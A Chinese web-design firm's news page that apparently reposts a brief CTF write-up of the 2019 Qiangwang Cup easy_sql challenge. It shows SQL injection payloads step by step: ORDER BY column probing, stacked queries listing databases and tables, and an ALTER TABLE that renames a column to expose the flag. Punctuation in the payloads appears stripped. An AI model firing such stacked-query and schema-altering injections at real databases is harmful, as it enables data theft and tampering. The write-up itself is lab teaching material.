ARTICLE DETAIL

资讯详情

深耕郑州网站建设与运营推广的一线实战洞察。

[强网杯 2019]随便注_CTF2

[强网杯 2019]随便注_CTF2 靶场环境easy_sql环境展示解题过程1. 判断注入类型输入1正常回显输入1报错说明存在单引号字符型注入。2. 判断字段数通过order by探测1 order by 1#正常1 order by 2#正常1 order by 3#报错说明当前查询语句有2 个字段。3. 发现过滤机制尝试联合查询1 union select 1,2#返回过滤提示select、update、where、insert等关键字被正则匹配并过滤且不区分大小写。4.查询所有数据库名1; show databases; #5.查看当前数据库中的表?inject-1;show tables;#6.直接查询现在的 words 表拿 flag?inject1;alter table words change flag id varchar(100);访问这个 URL 执行 alter 语句把字段flag改名为id。?inject1or 11;
返回列表